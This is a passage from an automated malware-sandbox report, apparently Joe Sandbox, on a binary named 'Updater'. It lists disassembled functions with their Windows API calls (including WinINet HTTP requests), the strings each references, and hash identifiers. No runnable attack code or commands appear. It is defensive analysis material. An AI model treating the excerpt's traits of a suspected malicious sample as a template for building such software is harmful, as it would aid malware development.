                                                                                                  • Instruction ID: d204709fbe9de226a00dafb26d5f4f1f9ae20733831a4cc7529a8d817d6dcb82
                                                                                                  • Opcode Fuzzy Hash: 751c4aafb1f5be5a18cf76928ac5c7e35682f8f9a7a69be9c1d95fd21adfd58d
                                                                                                  • Instruction Fuzzy Hash: E6519371D00209BADF14EBE0DD86EEEB77AAF18300F10416AF50672162DB782F59DB55
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcslen$BuffCharUpper
                                                                                                  • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                  • API String ID: 1256254125-769500911
                                                                                                  • Opcode ID: b1f18ba8a958b385e8db18730bf68b8766c698625667dece3e1fe15c60743139
                                                                                                  • Instruction ID: fce730318971bdb8a8ad55e487b73988403e9965b3813bde9d94513b4d202f1a
                                                                                                  • Opcode Fuzzy Hash: b1f18ba8a958b385e8db18730bf68b8766c698625667dece3e1fe15c60743139
                                                                                                  • Instruction Fuzzy Hash: 99316776F0412147EF655B7C88414BA7766EB61300F34803EED07AB306FA39AC22C742
                                                                                                  APIs
                                                                                                  • CreateMenu.USER32 ref: 00764622
                                                                                                  • SetMenu.USER32(?,00000000), ref: 00764631
                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007646BE
                                                                                                  • IsMenu.USER32(?), ref: 007646D2
                                                                                                  • CreatePopupMenu.USER32 ref: 007646DC
                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00764709
                                                                                                  • DrawMenuBar.USER32 ref: 00764711
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                  • String ID: 0$F
                                                                                                  • API String ID: 161812096-3044882817
                                                                                                  • Opcode ID: f0063afc4fdb7b4d547f7eb395fb668d8863279056abb5ff6d926cc5cf1b0841
                                                                                                  • Instruction ID: 9a2faac0e5953cd0ea701530e4cbdedc836b6d5b2b0524b2c364f1c0c028e972
                                                                                                  • Opcode Fuzzy Hash: f0063afc4fdb7b4d547f7eb395fb668d8863279056abb5ff6d926cc5cf1b0841
                                                                                                  • Instruction Fuzzy Hash: 2D417A78A01309EFDB24CFA4E884AAA7BB5FF4A314F144029FD46A7351C779AD20CB54
                                                                                                  APIs
                                                                                                    • Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45
                                                                                                    • Part of subcall function 00734D36: GetClassNameW.USER32(?,?,000000FF), ref: 00734D59
                                                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00733015
                                                                                                  • GetDlgCtrlID.USER32 ref: 00733020
                                                                                                  • GetParent.USER32 ref: 0073303C
                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 0073303F
                                                                                                  • GetDlgCtrlID.USER32(?), ref: 00733048
                                                                                                  • GetParent.USER32(?), ref: 0073305C
                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 0073305F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                  • String ID: ComboBox$ListBox
                                                                                                  • API String ID: 711023334-1403004172
                                                                                                  • Opcode ID: d32c1923c211f1009216995b9429d161394ef795dfb5db8378b06bbb2d5d6aa1
                                                                                                  • Instruction ID: 8acc547bdd0e39e9d492d0d86d00969287914fe139898a845ea00efc603c3fa7
                                                                                                  • Opcode Fuzzy Hash: d32c1923c211f1009216995b9429d161394ef795dfb5db8378b06bbb2d5d6aa1
                                                                                                  • Instruction Fuzzy Hash: 7721F570E00218FBDF24EBA0CC85EFEBB7AEF05350F00421AF956532A2DA795915DB64
                                                                                                  APIs
                                                                                                    • Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45
                                                                                                    • Part of subcall function 00734D36: GetClassNameW.USER32(?,?,000000FF), ref: 00734D59
                                                                                                  • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 007330F6
                                                                                                  • GetDlgCtrlID.USER32 ref: 00733101
                                                                                                  • GetParent.USER32 ref: 0073311D
                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00733120
                                                                                                  • GetDlgCtrlID.USER32(?), ref: 00733129
                                                                                                  • GetParent.USER32(?), ref: 0073313D
                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00733140
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                  • String ID: ComboBox$ListBox
                                                                                                  • API String ID: 711023334-1403004172
                                                                                                  • Opcode ID: d175ad6a904b7fbda51f0aa399e7df9d1ee8dc3f1f2715b3d46e3d52d98b1889
                                                                                                  • Instruction ID: b3970d25afc8323d6460d6a43f0bb9e7f3e17c03b941143eebbab019e0d02d82
                                                                                                  • Opcode Fuzzy Hash: d175ad6a904b7fbda51f0aa399e7df9d1ee8dc3f1f2715b3d46e3d52d98b1889
                                                                                                  • Instruction Fuzzy Hash: 0421D770E00218FBDF20EFA0CC85EEEBB79EF05350F004156F956532A2DA795918DB64
                                                                                                  APIs
                                                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 0076443F
                                                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00764442
                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00764469
                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0076448C
                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00764504
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$LongWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 312131281-0
                                                                                                  • Opcode ID: c331f820866ac28b0579eccaab7aab71cabb14db8bde963511a3d464f3daca9b
                                                                                                  • Instruction ID: f92b26451df6bb5a6a1915225826b15dc18669824007a43413afdcb6656d4d83
                                                                                                  • Opcode Fuzzy Hash: c331f820866ac28b0579eccaab7aab71cabb14db8bde963511a3d464f3daca9b
                                                                                                  • Instruction Fuzzy Hash: 86618C75900208AFDB20DFA8CC81EEE77B8EF49700F10415AFE16A7292D778AD56DB54
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free$FreeHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 2929853658-0
                                                                                                  • Opcode ID: ff8d30e4587c752288035708c26004be4add4462dafa16c5691882b3f2fc5874
                                                                                                  • Instruction ID: 146d133e7c996b4aae9c079ad470be9a3696ed666148bcb8c938e91fe472d2a8
                                                                                                  • Opcode Fuzzy Hash: ff8d30e4587c752288035708c26004be4add4462dafa16c5691882b3f2fc5874
                                                                                                  • Instruction Fuzzy Hash: 1D11777A504188FFCF45EF58C85ACDA3BA5EF04350B5192A5BB084B2A3DA35DA51EB40
                                                                                                  APIs
                                                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 006D9501
                                                                                                  • OleUninitialize.OLE32(?,00000000), ref: 006D95A0
                                                                                                  • UnregisterHotKey.USER32(?), ref: 006D9787
                                                                                                  • DestroyWindow.USER32(?), ref: 00718D83
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00718DE8
                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00718E15
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                  • String ID: close all
                                                                                                  • API String ID: 469580280-3243417748
                                                                                                  • Opcode ID: 575eaa9deed59933214deabfc691af5e8400f2c6bbfeea01678daf4d18479f94
                                                                                                  • Instruction ID: 664c6e25c9a359f0a077cda422d3db6c1a4fc6afb785156a414a77c3e921d773
                                                                                                  • Opcode Fuzzy Hash: 575eaa9deed59933214deabfc691af5e8400f2c6bbfeea01678daf4d18479f94
                                                                                                  • Instruction Fuzzy Hash: 71D18F31B01212CFCB65EF14D495B69F7A2BF04710F1042AEE90A6B3A2DB34AC62CF55
                                                                                                  APIs
                                                                                                    • Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45
                                                                                                  • CompareStringW.KERNEL32(00000400,00000001,?,?,?,?,REMOVE), ref: 0073C5C8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CompareString_wcslen
                                                                                                  • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                  • API String ID: 1025422365-769500911
                                                                                                  • Opcode ID: b0e1ece2793b2e0c250c82ccce568fc2f114032d9503f725bb57161eaf8f4755
                                                                                                  • Instruction ID: 9eafdd1e172bddca2f9c235ca228e0ca5cc133e48893f533ebae1cf432d9a4a7
                                                                                                  • Opcode Fuzzy Hash: b0e1ece2793b2e0c250c82ccce568fc2f114032d9503f725bb57161eaf8f4755
                                                                                                  • Instruction Fuzzy Hash: 96917B71A08301DFDB52DF14C885AAAB7E5FF88714F04492DF896AB2A2D778DD04CB52
                                                                                                  APIs
                                                                                                  • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 007443A0
                                                                                                    • Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45
                                                                                                  • LoadStringW.USER32(?,?,00000FFF,?), ref: 007443C6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LoadString$_wcslen
                                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                  • API String ID: 4099089115-2391861430
                                                                                                  • Opcode ID: ba2ae2c6c0c35c289e994e981119a94f4ccbd6293ba38f5b9524c2b9cdb1ca95
                                                                                                  • Instruction ID: 927fdad84479d14b5fd22b5cbec6471e4804cf0f6826e9564a664f87d030b523
                                                                                                  • Opcode Fuzzy Hash: ba2ae2c6c0c35c289e994e981119a94f4ccbd6293ba38f5b9524c2b9cdb1ca95
                                                                                                  • Instruction Fuzzy Hash: E6515171D00109FBCF15EBE0DC96EEEBB7AAF05300F04416AF506721A2DB381A95DB95
                                                                                                  APIs
                                                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0074CD53
                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0074CD7B
                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0074CDAB
                                                                                                  • GetLastError.KERNEL32 ref: 0074CE03
                                                                                                  • SetEvent.KERNEL32(?), ref: 0074CE17
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0074CE22
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                  • String ID:
                                                                                                  • API String ID: 3113390036-3916222277
                                                                                                  • Opcode ID: 9ac8dc9bad36e49b0f99a95dedd4477267c66dcf5a539aa59ff3ecc00c7fd814
                                                                                                  • Instruction ID: 6c4b55dea57e54628bb2ab0c22293f01ec6a16ada765b927bfe6195627582784
                                                                                                  • Opcode Fuzzy Hash: 9ac8dc9bad36e49b0f99a95dedd4477267c66dcf5a539aa59ff3ecc00c7fd814
                                                                                                  • Instruction Fuzzy Hash: 8C314BB1A01704AFD7729F65DC88AAB7BFCEB49740B10452EF446D7200DB78DD049BA1
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0072690F,?,?,Bad directive syntax error,0076D938,00000000,00000010,?,?), ref: 0073A68C
                                                                                                  • LoadStringW.USER32(00000000,?,0072690F,?), ref: 0073A693
                                                                                                    • Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45
                                                                                                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0073A757
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                  • API String ID: 858772685-4153970271
                                                                                                  • Opcode ID: 519374de3ea2652a56457fb0260e3fb0989cf9d0e86d1e4f6fd5f0fbb4a91c81
                                                                                                  • Instruction ID: 09352b13fed02ebc2811c9c6d0fe2ea01a3d2e76cdcbc2c2c1c1d1166cd762a4
                                                                                                  • Opcode Fuzzy Hash: 519374de3ea2652a56457fb0260e3fb0989cf9d0e86d1e4f6fd5f0fbb4a91c81
                                                                                                  • Instruction Fuzzy Hash: 6621CE72C1020EFBCF15EF90CC5AEEE773ABF18300F04446AF50A661A2DA749A58DB51
                                                                                                  APIs
                                                                                                  • GetParent.USER32 ref: 00733160
                                                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00733175
                                                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00733202
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ClassMessageNameParentSend
                                                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                  • API String ID: 1290815626-3381328864
                                                                                                  • Opcode ID: d7d0487fe2732e0e23f9636e470e65b1ce6064190fbf155315e1d27c2bd897cf
                                                                                                  • Instruction ID: 75ab997d00cc90a2860a92369466e63cff009ad831e437c892969504b97f8b63
                                                                                                  • Opcode Fuzzy Hash: d7d0487fe2732e0e23f9636e470e65b1ce6064190fbf155315e1d27c2bd897cf
                                                                                                  • Instruction Fuzzy Hash: 16110A7634870BBAFA302624EC07DB77B9C9B11734F20421AFA15A50D3FEAA7A005598
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                  • String ID:
                                                                                                  • API String ID: 1282221369-0
                                                                                                  • Opcode ID: 5da3ef9ae5f67b56a7710e22789cd7053e9ba856d1ca430e7a9b316fb84fe4c4
                                                                                                  • Instruction ID: 6effd0be89348f5f5a067e7e5248b8a7a7277f6d052ace1d7da5fc9451729db4
                                                                                                  • Opcode Fuzzy Hash: 5da3ef9ae5f67b56a7710e22789cd7053e9ba856d1ca430e7a9b316fb84fe4c4
                                                                                                  • Instruction Fuzzy Hash: 29610872B04301EFDB26AF78D88966E7FE4AF05350F1443BDEA459B2D2D63D89418790
                                                                                                  APIs
                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00728FD7
                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00728FF9
                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00729011
                                                                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0072902F
                                                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00729050
                                                                                                  • DestroyIcon.USER32(00000000,?,?,?,?,?,006DC4A3,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0072905F
                                                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0072907C
                                                                                                  • DestroyIcon.USER32(00000000,?,?,?,?,?,006DC4A3,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0072908B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                  • String ID:
                                                                                                  • API String ID: 1268354404-0
                                                                                                  • Opcode ID: 5734b2d417606804516c6e4e6db0f251b0a15f01ac734edd97d3b7e2c288de60
                                                                                                  • Instruction ID: f072c310324024ba6d86f5b4b15296610d78646efcec0c7ad1e390e717b5a8ca
                                                                                                  • Opcode Fuzzy Hash: 5734b2d417606804516c6e4e6db0f251b0a15f01ac734edd97d3b7e2c288de60
                                                                                                  • Instruction Fuzzy Hash: E0518970A0170AEFDB20DF25DC45BAA3BB6EB48314F104218F90697290DBB9ED81DB64
                                                                                                  APIs
                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0074CC63
                                                                                                  • GetLastError.KERNEL32 ref: 0074CC76
                                                                                                  • SetEvent.KERNEL32(?), ref: 0074CC8A
                                                                                                    • Part of subcall function 0074CD34: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0074CD53
                                                                                                    • Part of subcall function 0074CD34: GetLastError.KERNEL32 ref: 0074CE03
                                                                                                    • Part of subcall function 0074CD34: SetEvent.KERNEL32(?), ref: 0074CE17
                                                                                                    • Part of subcall function 0074CD34: InternetCloseHandle.WININET(00000000), ref: 0074CE22
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
